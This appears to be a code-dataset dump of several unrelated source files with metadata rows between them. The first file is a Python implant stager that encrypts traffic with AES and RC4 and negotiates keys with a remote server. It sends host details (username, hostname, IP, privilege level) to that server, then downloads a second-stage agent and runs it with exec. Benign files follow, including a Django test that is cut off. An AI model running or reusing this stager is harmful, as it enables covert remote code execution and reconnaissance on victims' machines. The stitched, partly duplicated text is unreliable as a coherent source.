result.append((self.S[ t[(i + s3) % 4] & 0xFF] ^ tt ) & 0xFF)
return result
def decrypt(self, ciphertext):
'Decrypt a block of cipher text using the AES block cipher.'
if len(ciphertext) != 16:
raise ValueError('wrong block length')
rounds = len(self._Kd) - 1
(s1, s2, s3) = [3, 2, 1]
a = [0, 0, 0, 0]
# Convert ciphertext to (ints ^ key)
t = [(_compact_word(ciphertext[4 * i:4 * i + 4]) ^ self._Kd[0][i]) for i in xrange(0, 4)]
# Apply round transforms
for r in xrange(1, rounds):
for i in xrange(0, 4):
a[i] = (self.T5[(t[ i ] >> 24) & 0xFF] ^
self.T6[(t[(i + s1) % 4] >> 16) & 0xFF] ^
self.T7[(t[(i + s2) % 4] >> 8) & 0xFF] ^
self.T8[ t[(i + s3) % 4] & 0xFF] ^
self._Kd[r][i])
t = copy.copy(a)
# The last round is special
result = []
for i in xrange(0, 4):
tt = self._Kd[rounds][i]
result.append((self.Si[(t[ i ] >> 24) & 0xFF] ^ (tt >> 24)) & 0xFF)
result.append((self.Si[(t[(i + s1) % 4] >> 16) & 0xFF] ^ (tt >> 16)) & 0xFF)
result.append((self.Si[(t[(i + s2) % 4] >> 8) & 0xFF] ^ (tt >> 8)) & 0xFF)
result.append((self.Si[ t[(i + s3) % 4] & 0xFF] ^ tt ) & 0xFF)
return result
def decrypt(self, ciphertext):
if len(ciphertext) != 16:
raise ValueError('wrong block length')
rounds = len(self._Kd) - 1
(s1, s2, s3) = [3, 2, 1]
a = [0, 0, 0, 0]
# Convert ciphertext to (ints ^ key)
t = [(_compact_word(ciphertext[4 * i:4 * i + 4]) ^ self._Kd[0][i]) for i in xrange(0, 4)]
# Apply round transforms
for r in xrange(1, rounds):
for i in xrange(0, 4):
a[i] = (self.T5[(t[ i ] >> 24) & 0xFF] ^
self.T6[(t[(i + s1) % 4] >> 16) & 0xFF] ^
self.T7[(t[(i + s2) % 4] >> 8) & 0xFF] ^
self.T8[ t[(i + s3) % 4] & 0xFF] ^
self._Kd[r][i])
t = copy.copy(a)
# The last round is special
result = [ ]
for i in xrange(0, 4):
tt = self._Kd[rounds][i]
result.append((self.Si[(t[ i ] >> 24) & 0xFF] ^ (tt >> 24)) & 0xFF)
result.append((self.Si[(t[(i + s1) % 4] >> 16) & 0xFF] ^ (tt >> 16)) & 0xFF)
result.append((self.Si[(t[(i + s2) % 4] >> 8) & 0xFF] ^ (tt >> 8)) & 0xFF)
result.append((self.Si[ t[(i + s3) % 4] & 0xFF] ^ tt ) & 0xFF)
return result
class AESBlockModeOfOperation(object):
'''Super-class for AES modes of operation that require blocks.'''
def __init__(self, key):
self._aes = AES(key)
def decrypt(self, ciphertext):
raise Exception('not implemented')
def encrypt(self, plaintext):
raise Exception('not implemented')
class AESModeOfOperationCBC(AESBlockModeOfOperation):
name = "Cipher-Block Chaining (CBC)"
def __init__(self, key, iv=None):
if iv is None:
self._last_cipherblock = [0] * 16
elif len(iv) != 16:
raise ValueError('initialization vector must be 16 bytes')
else:
self._last_cipherblock = _string_to_bytes(iv)
AESBlockModeOfOperation.__init__(self, key)
def encrypt(self, plaintext):
if len(plaintext) != 16:
raise ValueError('plaintext block must be 16 bytes')
plaintext = _string_to_bytes(plaintext)
precipherblock = [(p ^ l) for (p, l) in zip(plaintext, self._last_cipherblock)]
self._last_cipherblock = self._aes.encrypt(precipherblock)
return _bytes_to_string(self._last_cipherblock)
def decrypt(self, ciphertext):
if len(ciphertext) != 16:
raise ValueError('ciphertext block must be 16 bytes')
cipherblock = _string_to_bytes(ciphertext)
plaintext = [(p ^ l) for (p, l) in zip(self._aes.decrypt(cipherblock), self._last_cipherblock)]
self._last_cipherblock = cipherblock
return _bytes_to_string(plaintext)
def CBCenc(aesObj, plaintext, base64=False):
# break the blocks in 16 byte chunks, padding the last chunk if necessary
blocks = [plaintext[0+i:16+i] for i in range(0, len(plaintext), 16)]
blocks[-1] = append_PKCS7_padding(blocks[-1])
ciphertext = ""
for block in blocks:
ciphertext += aesObj.encrypt(block)
return ciphertext
def CBCdec(aesObj, ciphertext, base64=False):
# break the blocks in 16 byte chunks, padding the last chunk if necessary
blocks = [ciphertext[0+i:16+i] for i in range(0, len(ciphertext), 16)]
plaintext = ""
for x in xrange(0, len(blocks)-1):
plaintext += aesObj.decrypt(blocks[x])
plaintext += strip_PKCS7_padding(aesObj.decrypt(blocks[-1]))
return plaintext
def getIV(len=16):
return ''.join(chr(random.randint(0, 255)) for _ in range(len))
def aes_encrypt(key, data):
"""
Generate a random IV and new AES cipher object with the given
key, and return IV + encryptedData.
"""
IV = getIV()
aes = AESModeOfOperationCBC(key, iv=IV)
return IV + CBCenc(aes, data)
def aes_encrypt_then_hmac(key, data):
"""
Encrypt the data then calculate HMAC over the ciphertext.
"""
data = aes_encrypt(key, data)
mac = hmac.new(str(key), data, hashlib.sha256).digest()
return data + mac[0:10]
def aes_decrypt(key, data):
"""
Generate an AES cipher object, pull out the IV from the data
and return the unencrypted data.
"""
IV = data[0:16]
aes = AESModeOfOperationCBC(key, iv=IV)
return CBCdec(aes, data[16:])
def verify_hmac(key, data):
"""
Verify the HMAC supplied in the data with the given key.
"""
if len(data) > 20:
mac = data[-10:]
data = data[:-10]
expected = hmac.new(key, data, hashlib.sha256).digest()[0:10]
# Double HMAC to prevent timing attacks. hmac.compare_digest() is
# preferable, but only available since Python 2.7.7.
return hmac.new(str(key), expected).digest() == hmac.new(str(key), mac).digest()
else:
return False
def aes_decrypt_and_verify(key, data):
"""
Decrypt the data, but only if it has a valid MAC.
"""
if len(data) > 32 and verify_hmac(key, data):
return aes_decrypt(key, data[:-10])
raise Exception("Invalid ciphertext received.")
def rc4(key, data):
"""
Decrypt/encrypt the passed data using RC4 and the given key.
"""
S,j,out=range(256),0,[]
for i in range(256):
j=(j+S[i]+ord(key[i%len(key)]))%256
S[i],S[j]=S[j],S[i]
i=j=0
for char in data:
i=(i+1)%256
j=(j+S[i])%256
S[i],S[j]=S[j],S[i]
out.append(chr(ord(char)^S[(S[i]+S[j])%256]))
return ''.join(out)
def parse_routing_packet(stagingKey, data):
"""
Decodes the rc4 "routing packet" and parses raw agent data into:
{sessionID : (language, meta, additional, [encData]), ...}
Routing packet format:
+---------+-------------------+--------------------------+
| RC4 IV | RC4s(RoutingData) | AESc(client packet data) | ...
+---------+-------------------+--------------------------+
| 4 | 16 | RC4 length |
+---------+-------------------+--------------------------+
RC4s(RoutingData):
+-----------+------+------+-------+--------+
| SessionID | Lang | Meta | Extra | Length |
+-----------+------+------+-------+--------+
| 8 | 1 | 1 | 2 | 4 |
+-----------+------+------+-------+--------+
"""
if data:
results = {}
offset = 0
# ensure we have at least the 20 bytes for a routing packet
if len(data) >= 20:
while True:
if len(data) - offset < 20:
break
RC4IV = data[0+offset:4+offset]
RC4data = data[4+offset:20+offset]
routingPacket = rc4(RC4IV+stagingKey, RC4data)
sessionID = routingPacket[0:8]
# B == 1 byte unsigned char, H == 2 byte unsigned short, L == 4 byte unsigned long
(language, meta, additional, length) = struct.unpack("=BBHL", routingPacket[8:])
if length < 0:
encData = None
else:
encData = data[(20+offset):(20+offset+length)]
results[sessionID] = (LANGUAGE_IDS.get(language, 'NONE'), META_IDS.get(meta, 'NONE'), ADDITIONAL_IDS.get(additional, 'NONE'), encData)
# check if we're at the end of the packet processing
remainingData = data[20+offset+length:]
if not remainingData or remainingData == '':
break
offset += 20 + length
return results
else:
print "[*] parse_agent_data() data length incorrect: %s" % (len(data))
return None
else:
print "[*] parse_agent_data() data is None"
return None
def build_routing_packet(stagingKey, sessionID, meta=0, additional=0, encData=''):
"""
Takes the specified parameters for an RC4 "routing packet" and builds/returns
an HMAC'ed RC4 "routing packet".
packet format:
Routing Packet:
+---------+-------------------+--------------------------+
| RC4 IV | RC4s(RoutingData) | AESc(client packet data) | ...
+---------+-------------------+--------------------------+
| 4 | 16 | RC4 length |
+---------+-------------------+--------------------------+
RC4s(RoutingData):
+-----------+------+------+-------+--------+
| SessionID | Lang | Meta | Extra | Length |
+-----------+------+------+-------+--------+
| 8 | 1 | 1 | 2 | 4 |
+-----------+------+------+-------+--------+
"""
# binary pack all of the passed config values as unsigned numbers
# B == 1 byte unsigned char, H == 2 byte unsigned short, L == 4 byte unsigned long
data = sessionID + struct.pack("=BBHL", 2, meta, additional, len(encData))
RC4IV = os.urandom(4)
key = RC4IV + stagingKey
rc4EncData = rc4(key, data)
packet = RC4IV + rc4EncData + encData
return packet
def post_message(uri, data):
global headers
return (urllib2.urlopen(urllib2.Request(uri, data, headers))).read()
def get_sysinfo(nonce='00000000'):
# nonce | listener | domainname | username | hostname | internal_ip | os_details | os_details | high_integrity | process_name | process_id | language | language_version
__FAILED_FUNCTION = '[FAILED QUERY]'
try:
username = pwd.getpwuid(os.getuid())[0]
except Exception as e:
username = __FAILED_FUNCTION
try:
uid = os.popen('id -u').read().strip()
except Exception as e:
uid = __FAILED_FUNCTION
try:
highIntegrity = "True" if (uid == "0") else False
except Exception as e:
highIntegrity = __FAILED_FUNCTION
try:
osDetails = os.uname()
except Exception as e:
osDetails = __FAILED_FUNCTION
try:
hostname = osDetails[1]
except Exception as e:
hostname = __FAILED_FUNCTION
try:
internalIP = socket.gethostbyname(socket.gethostname())
except Exception as e:
internalIP = __FAILED_FUNCTION
try:
osDetails = ",".join(osDetails)
except Exception as e:
osDetails = __FAILED_FUNCTION
try:
processID = os.getpid()
except Exception as e:
processID = __FAILED_FUNCTION
try:
temp = sys.version_info
pyVersion = "%s.%s" % (temp[0],temp[1])
except Exception as e:
pyVersion = __FAILED_FUNCTION
language = 'python'
cmd = 'ps %s' % (os.getpid())
ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
out = ps.stdout.read()
parts = out.split("\n")
ps.stdout.close()
if len(parts) > 2:
processName = " ".join(parts[1].split()[4:])
else:
processName = 'python'
return "%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s" % (nonce, server, '', username, hostname, internalIP, osDetails, highIntegrity, processName, processID, language, pyVersion)
# generate a randomized sessionID
sessionID = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in xrange(8))
# server configuration information
stagingKey = "REPLACE_STAGING_KEY"
profile = 'REPLACE_PROFILE'
WorkingHours = 'SET_WORKINGHOURS'
KillDate = 'SET_KILLDATE'
parts = profile.split('|')
taskURIs = parts[0].split(',')
userAgent = parts[1]
headersRaw = parts[2:]
# global header dictionary
# sessionID is set by stager.py
# headers = {'User-Agent': userAgent, "Cookie": "SESSIONID=%s" % (sessionID)}
headers = {'User-Agent': userAgent}
# parse the headers into the global header dictionary
for headerRaw in headersRaw:
try:
headerKey = headerRaw.split(":")[0]
headerValue = headerRaw.split(":")[1]
if headerKey.lower() == "cookie":
headers['Cookie'] = "%s;%s" % (headers['Cookie'], headerValue)
else:
headers[headerKey] = headerValue
except:
pass
# stage 3 of negotiation -> client generates DH key, and POSTs HMAC(AESn(PUBc)) back to server
clientPub = DiffieHellman()
hmacData = aes_encrypt_then_hmac(stagingKey, str(clientPub.publicKey))
# RC4 routing packet:
# meta = STAGE1 (2)
routingPacket = build_routing_packet(stagingKey=stagingKey, sessionID=sessionID, meta=2, encData=hmacData)
try:
postURI = server + '/index.jsp'
# response = post_message(postURI, routingPacket+hmacData)
response = post_message(postURI, routingPacket)
except:
exit()
# decrypt the server's public key and the server nonce
packet = aes_decrypt_and_verify(stagingKey, response)
nonce = packet[0:16]
serverPub = int(packet[16:])
# calculate the shared secret
clientPub.genKey(serverPub)
key = clientPub.key
# step 5 -> client POSTs HMAC(AESs([nonce+1]|sysinfo)
postURI = server + '/index.php'
hmacData = aes_encrypt_then_hmac(clientPub.key, get_sysinfo(nonce=str(int(nonce)+1)))
# RC4 routing packet:
# sessionID = sessionID
# language = PYTHON (2)
# meta = STAGE2 (3)
# extra = 0
# length = len(length)
routingPacket = build_routing_packet(stagingKey=stagingKey, sessionID=sessionID, meta=3, encData=hmacData)
response = post_message(postURI, routingPacket)
# step 6 -> server sends HMAC(AES)
agent = aes_decrypt_and_verify(key, response)
agent = agent.replace('REPLACE_WORKINGHOURS', WorkingHours)
agent = agent.replace('REPLACE_KILLDATE', KillDate)
exec(agent)
| 83.41217 | 3,081 | 0.734419 | 6,843 | 72,652 | 7.75917 | 0.412977 | 0.000904 | 0.002147 | 0.003616 | 0.071568 | 0.059421 | 0.046783 | 0.04377 | 0.039193 | 0.035163 | 0 | 0.396735 | 0.163533 | 72,652 | 870 | 3,082 | 83.508046 | 0.476971 | 0.039063 | 0 | 0.27853 | 0 | 0.001934 | 0.015824 | 0.000527 | 0 | 1 | 0.593224 | 0 | 0 | 0 | null | null | 0.001934 | 0.030948 | null | null | 0.009671 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0a26d509ef395cda8929c87d0681831d3d8b0272 | 182 | py | Python | pkgs/clean-pkg/src/genie/libs/clean/stages/nxos/n3k/image_handler.py | jbronikowski/genielibs | 200a34e5fe4838a27b5a80d5973651b2e34ccafb | [
"Apache-2.0"
] | 94 | 2018-04-30T20:29:15.000Z | 2022-03-29T13:40:31.000Z | pkgs/clean-pkg/src/genie/libs/clean/stages/nxos/n3k/image_handler.py | jbronikowski/genielibs | 200a34e5fe4838a27b5a80d5973651b2e34ccafb | [
"Apache-2.0"
] | 67 | 2018-12-06T21:08:09.000Z | 2022-03-29T18:00:46.000Z | pkgs/clean-pkg/src/genie/libs/clean/stages/nxos/n3k/image_handler.py | jbronikowski/genielibs | 200a34e5fe4838a27b5a80d5973651b2e34ccafb | [
"Apache-2.0"
] | 49 | 2018-06-29T18:59:03.000Z | 2022-03-10T02:07:59.000Z | '''NXOS N3K: Image Handler Class'''
# Genie
from genie.libs.clean.stages.nxos.n9k.image_handler import ImageHandler as N9KImageHandler
class ImageHandler(N9KImageHandler):
pass | 26 | 90 | 0.791209 | 23 | 182 | 6.217391 | 0.695652 | 0.167832 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.024845 | 0.115385 | 182 | 7 | 91 | 26 | 0.863354 | 0.197802 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
0a32df7796aa5a70685547140b2fb5181786706c | 29 | py | Python | graphlearning/__init__.py | jwcalder/GraphLearningOld | 04bece45cd512cf1a3bcddb163b767ca44a746e1 | [
"MIT"
] | 46 | 2019-11-06T22:05:56.000Z | 2022-03-30T07:02:36.000Z | graphlearning/__init__.py | jwcalder/GraphLearningOld | 04bece45cd512cf1a3bcddb163b767ca44a746e1 | [
"MIT"
] | 2 | 2020-10-08T16:36:04.000Z | 2021-09-30T19:37:23.000Z | graphlearning/__init__.py | jwcalder/GraphLearningOld | 04bece45cd512cf1a3bcddb163b767ca44a746e1 | [
"MIT"
] | 15 | 2020-08-25T00:57:18.000Z | 2022-02-02T14:42:31.000Z | from .graphlearning import *
| 14.5 | 28 | 0.793103 | 3 | 29 | 7.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.137931 | 29 | 1 | 29 | 29 | 0.92 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0a81ddff283dc565e12ebf0176547c03276464c1 | 176 | py | Python | programs/pyeos/tests/python/codestore/math.py | learnforpractice/pyeos | 4f04eb982c86c1fdb413084af77c713a6fda3070 | [
"MIT"
] | 144 | 2017-10-18T16:38:51.000Z | 2022-01-09T12:43:57.000Z | programs/pyeos/tests/python/codestore/math.py | openchatproject/safeos | 2c8dbf57d186696ef6cfcbb671da9705b8f3d9f7 | [
"MIT"
] | 60 | 2017-10-11T13:07:43.000Z | 2019-03-26T04:33:27.000Z | programs/pyeos/tests/python/codestore/math.py | learnforpractice/pyeos | 4f04eb982c86c1fdb413084af77c713a6fda3070 | [
"MIT"
] | 38 | 2017-12-05T01:13:56.000Z | 2022-01-07T07:06:53.000Z | def auth(func):
def func_wrapper(*args):
print('TODO: authorization check')
return func(*args)
return func_wrapper
@auth
def add(a, b):
return a+b
| 17.6 | 42 | 0.619318 | 25 | 176 | 4.28 | 0.52 | 0.205607 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.261364 | 176 | 9 | 43 | 19.555556 | 0.823077 | 0 | 0 | 0 | 0 | 0 | 0.142045 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.375 | false | 0 | 0 | 0.125 | 0.75 | 0.125 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
0a849c605d4aef02c69f467436194d1bfba06c3c | 188 | py | Python | sst/tests/static/comments_before_markdown.py | Adamage/tutorials | b6600c052613909dbec378fea4a69deff46004dc | [
"MIT"
] | null | null | null | sst/tests/static/comments_before_markdown.py | Adamage/tutorials | b6600c052613909dbec378fea4a69deff46004dc | [
"MIT"
] | 78 | 2021-09-20T11:48:08.000Z | 2021-10-21T07:10:39.000Z | sst/tests/static/comments_before_markdown.py | Adamage/tutorials | b6600c052613909dbec378fea4a69deff46004dc | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Comments should work here
"""
Example first cell
"""
def hello(name):
print(f'Hello {name}!') #hello
"""
Example second cell
"""
# comments should work here
| 13.428571 | 34 | 0.664894 | 26 | 188 | 4.807692 | 0.653846 | 0.224 | 0.288 | 0.352 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006452 | 0.175532 | 188 | 13 | 35 | 14.461538 | 0.8 | 0.515957 | 0 | 0 | 0 | 0 | 0.245283 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0 | 0.5 | 0.5 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
0a85e108460545b246badaf1a46b4e18a4a85665 | 39 | py | Python | basic_types/__init__.py | Octavian-ai/synthetic-graph-data | b327cfb06d420d216a5377f2ce953355089e0e6b | [
"MIT"
] | 16 | 2018-09-06T09:27:03.000Z | 2021-05-28T01:35:44.000Z | basic_types/__init__.py | Octavian-ai/generate-data | b327cfb06d420d216a5377f2ce953355089e0e6b | [
"MIT"
] | 1 | 2021-02-10T00:02:43.000Z | 2021-02-10T00:02:43.000Z | basic_types/__init__.py | Octavian-ai/generate-data | b327cfb06d420d216a5377f2ce953355089e0e6b | [
"MIT"
] | 7 | 2018-07-23T08:39:54.000Z | 2021-02-08T16:24:54.000Z | from .nano_type import NanoType, NanoID | 39 | 39 | 0.846154 | 6 | 39 | 5.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.102564 | 39 | 1 | 39 | 39 | 0.914286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0aa66c017e50135145fb85893df0e757705b1dbd | 58 | py | Python | tests/exam/mod2.py | Mieschendahl/assignment-final-stub | 19eea657fcc4f8a455c42028f34b918628514cc0 | [
"MIT"
] | null | null | null | tests/exam/mod2.py | Mieschendahl/assignment-final-stub | 19eea657fcc4f8a455c42028f34b918628514cc0 | [
"MIT"
] | 1 | 2022-03-20T11:08:45.000Z | 2022-03-20T11:08:45.000Z | tests/exam/mod2.py | Mieschendahl/assignment-final-stub | 19eea657fcc4f8a455c42028f34b918628514cc0 | [
"MIT"
] | 6 | 2022-03-13T13:10:25.000Z | 2022-03-28T22:18:12.000Z | #in=-23801594708
#golden=-42
print(input_int() % 2345678)
| 14.5 | 28 | 0.724138 | 8 | 58 | 5.125 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.377358 | 0.086207 | 58 | 3 | 29 | 19.333333 | 0.396226 | 0.431034 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
0abad766ca7d6167e7a9cfb991c13b3c1c24d798 | 72 | py | Python | src/__init__.py | MattHartshorn/aes-encryption | b06b11b90b4f9d850db602198e5ff404aadb47da | [
"MIT"
] | null | null | null | src/__init__.py | MattHartshorn/aes-encryption | b06b11b90b4f9d850db602198e5ff404aadb47da | [
"MIT"
] | null | null | null | src/__init__.py | MattHartshorn/aes-encryption | b06b11b90b4f9d850db602198e5ff404aadb47da | [
"MIT"
] | null | null | null | from . import actions
from . import aescypher
from . import keygenerator | 24 | 26 | 0.805556 | 9 | 72 | 6.444444 | 0.555556 | 0.517241 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.152778 | 72 | 3 | 26 | 24 | 0.95082 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0ac1230b9c716e556f67b6ecfee406f1fc10d82a | 101 | py | Python | site/thicc/apps/wow/views.py | aldenjenkins/ThiccGaming | 4790d2568b019438d1569d0fe4e9f9aba008b737 | [
"BSD-3-Clause"
] | null | null | null | site/thicc/apps/wow/views.py | aldenjenkins/ThiccGaming | 4790d2568b019438d1569d0fe4e9f9aba008b737 | [
"BSD-3-Clause"
] | 9 | 2020-03-24T16:20:31.000Z | 2022-03-11T23:32:38.000Z | site/thicc/apps/wow/views.py | aldenjenkins/ThiccGaming | 4790d2568b019438d1569d0fe4e9f9aba008b737 | [
"BSD-3-Clause"
] | null | null | null | from django.shortcuts import render
def index(request):
return render(request, 'wow/wow.html')
| 16.833333 | 42 | 0.742574 | 14 | 101 | 5.357143 | 0.785714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.148515 | 101 | 5 | 43 | 20.2 | 0.872093 | 0 | 0 | 0 | 0 | 0 | 0.118812 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
0ac30575054767f1ee2c1dea7fe3d5eb8a972fc8 | 35,542 | py | Python | biosys/apps/main/tests/api/test_schema_inference.py | parksandwildlife/biosys | 0682cf1b4055e7cae59fb53045fa441af6d48f5e | [
"Apache-2.0"
] | 2 | 2018-04-09T04:02:30.000Z | 2019-08-20T03:12:55.000Z | biosys/apps/main/tests/api/test_schema_inference.py | parksandwildlife/biosys | 0682cf1b4055e7cae59fb53045fa441af6d48f5e | [
"Apache-2.0"
] | 29 | 2016-01-20T08:14:15.000Z | 2017-07-13T07:17:32.000Z | biosys/apps/main/tests/api/test_schema_inference.py | parksandwildlife/biosys | 0682cf1b4055e7cae59fb53045fa441af6d48f5e | [
"Apache-2.0"
] | 5 | 2016-01-14T23:02:36.000Z | 2016-09-21T05:35:03.000Z | import datetime as dt
from os import path
import json
from datapackage import Package
from django.core.exceptions import ValidationError
from django.shortcuts import reverse
from django.utils import six
from rest_framework import status
from rest_framework.authtoken.models import Token
from rest_framework.test import APIRequestFactory, force_authenticate
from main import utils_data_package
from main.models import Dataset
from main.tests.api import helpers
from main.utils_data_package import BiosysSchema
from main.api.views import InferDatasetView
class InferTestBase(helpers.BaseUserTestCase):
def verify_biosys_dataset(self, data_package, dataset_type):
"""
Verify that the dataset model validation is error free
:param data_package:
:param dataset_type:
:return:
"""
try:
Dataset.validate_data_package(data_package, dataset_type)
except ValidationError as e:
self.fail('Dataset validation error: {}'.format(e))
def verify_inferred_data(self, received):
"""
Test that the data returned by the infer endpoint are valid and can be used to create a dataset through API
:param received should be of the form
{
'name': 'dataset name'
'type': 'generic'|'observation'|'species_observation'
'data_package': {
# a valid data package with schema
}
}
"""
self.assertIn('name', received)
# self.assertIsNotNone(received.get('name'))
self.assertIn('type', received)
self.assertIn(received.get('type'), ['generic', 'observation', 'species_observation'])
# dataset
self.verify_biosys_dataset(received.get('data_package'), received.get('type'))
# Verify that we can create a dataset from the inference result.
url = reverse('api:dataset-list')
client = self.data_engineer_1_client
project = self.project_1
payload = {
'project': project.pk,
'name': received.get('name'),
'type': received.get('type'),
'data_package': received.get('data_package')
}
resp = client.post(url, payload, format='json')
self.assertIn(resp.status_code, [status.HTTP_200_OK, status.HTTP_201_CREATED])
class TestGenericSchema(InferTestBase):
def _more_setup(self):
self.url = reverse('api:infer-dataset')
def test_generic_string_and_number_simple_xls(self):
"""
Test that the infer detect numbers and integers type
"""
columns = ['Name', 'Age', 'Weight', 'Comments']
rows = [
columns,
['Frederic', 56, 80.5, 'a comment'],
['Hilda', 24, 56, '']
]
client = self.data_engineer_1_client
file_ = helpers.rows_to_xlsx_file(rows)
with open(file_, 'rb') as fp:
payload = {
'file': fp,
}
resp = client.post(self.url, data=payload, format='multipart')
self.assertEqual(status.HTTP_200_OK, resp.status_code)
# should be json
self.assertEqual(resp.get('content-type'), 'application/json')
received = resp.json()
# name should be set with the file name
self.assertIn('name', received)
file_name = path.splitext(path.basename(fp.name))[0]
self.assertEqual(file_name, received.get('name'))
# type should be 'generic'
self.assertIn('type', received)
self.assertEqual('generic', received.get('type'))
# data_package verification
self.assertIn('data_package', received)
self.verify_inferred_data(received)
# verify schema
schema_descriptor = Package(received.get('data_package')).resources[0].descriptor['schema']
schema = utils_data_package.GenericSchema(schema_descriptor)
self.assertEqual(len(schema.fields), len(columns))
self.assertEqual(schema.field_names, columns)
field = schema.get_field_by_name('Name')
self.assertEqual(field.type, 'string')
self.assertFalse(field.required)
self.assertEqual(field.format, 'default')
field = schema.get_field_by_name('Age')
self.assertEqual(field.type, 'integer')
self.assertFalse(field.required)
self.assertEqual(field.format, 'default')
field = schema.get_field_by_name('Weight')
self.assertEqual(field.type, 'number')
self.assertFalse(field.required)
self.assertEqual(field.format, 'default')
field = schema.get_field_by_name('Comments')
self.assertEqual(field.type, 'string')
self.assertFalse(field.required)
self.assertEqual(field.format, 'default')
def test_generic_string_and_number_simple_csv(self):
"""
Test that the infer detect numbers and integers type
"""
columns = ['Name', 'Age', 'Weight', 'Comments']
rows = [
columns,
['Frederic', '56', '80.5', 'a comment'],
['Hilda', '24', '56', '']
]
client = self.data_engineer_1_client
file_ = helpers.rows_to_csv_file(rows)
with open(file_, 'rb') as fp:
payload = {
'file': fp,
}
resp = client.post(self.url, data=payload, format='multipart')
self.assertEqual(status.HTTP_200_OK, resp.status_code)
# should be json
self.assertEqual(resp.get('content-type'), 'application/json')
received = resp.json()
# name should be set with the file name
self.assertIn('name', received)
file_name = path.splitext(path.basename(fp.name))[0]
self.assertEqual(file_name, received.get('name'))
# type should be 'generic'
self.assertIn('type', received)
self.assertEqual('generic', received.get('type'))
# data_package verification
self.assertIn('data_package', received)
self.verify_inferred_data(received)
# verify schema
schema_descriptor = Package(received.get('data_package')).resources[0].descriptor['schema']
schema = utils_data_package.GenericSchema(schema_descriptor)
self.assertEqual(len(schema.fields), len(columns))
self.assertEqual(schema.field_names, columns)
field = schema.get_field_by_name('Name')
